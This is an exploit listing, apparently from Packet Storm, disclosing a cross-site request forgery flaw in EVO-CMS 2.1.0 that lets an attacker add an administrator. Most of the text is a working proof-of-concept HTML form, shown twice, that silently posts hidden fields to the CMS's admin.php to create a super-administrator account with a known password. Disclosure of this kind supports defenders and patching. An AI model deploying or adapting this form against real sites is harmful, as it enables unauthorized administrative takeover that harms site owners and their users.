EVO-CMS 2.1.0 Cross Site Request Forgery

🗓️ 24 Feb 2015 00:00:00Reported by ProvensecType

packetstorm🔗 packetstormsecurity.com👁 31 Views

EVO-CMS 2.1.0 Cross Site Request Forgery vulnerability allows adding new admin via CSRF attac

`# Affected software: evo cms  
# Type of vulnerability: adding new admin (csrf)  
# URL: http://www.evo-german.com/  
# Discovered by: Provensec  
# Website: http://www.provensec.com  
#version:EVO-CMS 2.1.0  
# Proof of concept  
  
attacker was able to add new admin as there were no protection against csrf  
  
  
poc  
  
<html>  
  
<body>  
<form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">  
<input type="hidden" name="authors[add_name]" value="test" />  
<input type="hidden" name="authors[add_aid]"  
value="test123" />  
<input type="hidden" name="authors[add_email]"  
value="[email protected]" />  
<input type="hidden" name="authors[add_url]"  
value="http://demo.opensourcecms.com/evocms/" />  
<input type="hidden" name="authors[add_admlanguage]"  
value="english" />  
<input type="hidden" name="authors[add_radminsuper]"  
value="1" />  
<input type="hidden" name="authors[add_pwd]"  
value="test123" />  
<input type="hidden" name="authors[add_pwd2]"  
value="test123" />  
<input type="hidden" name="op" value="addadmin" />  
<input type="hidden" name="module" value="authors" />  
<input type="hidden" name="submit" value="Create Administrator" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
  
  
  
  
  
  
  
  
poc:  
  
<html>  
  
<body>  
<form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">  
<input type="hidden" name="authors[add_name]" value="test" />  
<input type="hidden" name="authors[add_aid]"  
value="test123" />  
<input type="hidden" name="authors[add_email]"  
value="[email protected]" />  
<input type="hidden" name="authors[add_url]"  
value="http://demo.opensourcecms.com/evocms/" />  
<input type="hidden" name="authors[add_admlanguage]"  
value="english" />  
<input type="hidden" name="authors[add_radminsuper]"  
value="1" />  
<input type="hidden" name="authors[add_pwd]"  
value="test123" />  
<input type="hidden" name="authors[add_pwd2]"  
value="test123" />  
<input type="hidden" name="op" value="addadmin" />  
<input type="hidden" name="module" value="authors" />  
<input type="hidden" name="submit" value="Create Administrator" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

24 Feb 2015 00:00Current

0.8Low risk

Vulners AI Score0.8